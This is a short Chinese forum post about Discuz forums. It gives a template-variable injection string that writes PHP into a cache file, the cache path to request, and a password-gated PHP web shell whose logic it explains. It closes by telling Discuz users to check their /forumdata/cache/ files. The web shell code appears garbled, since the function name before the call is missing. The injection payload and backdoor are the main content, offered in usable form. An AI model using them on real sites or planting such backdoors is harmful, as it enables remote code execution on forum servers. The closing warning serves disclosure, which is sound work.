| 自定义模板变量:变      量 : {','');ECHO '';$X=SUBSTR(MD5($_GET['B']),28);IF($X=='7aaa')($_POST['A']);//}
 替换内容 : aaaaaaaaaa
 
 
 然后链接 http://www.site.com/forumdata/cache/usergroup_0.php
 
 
 
程序代码: <?php (substr(md5($_POST['b']),28)=='7aaa') && ($_POST['a']);?> 
 对post的变量b进行md5加密,如果第28-31位是7aaa的话 就执行($_POST['a']);
 
 
 
 使用DZ论坛的同学请自行检查一下/forumdata/cache/下的文件
 
 |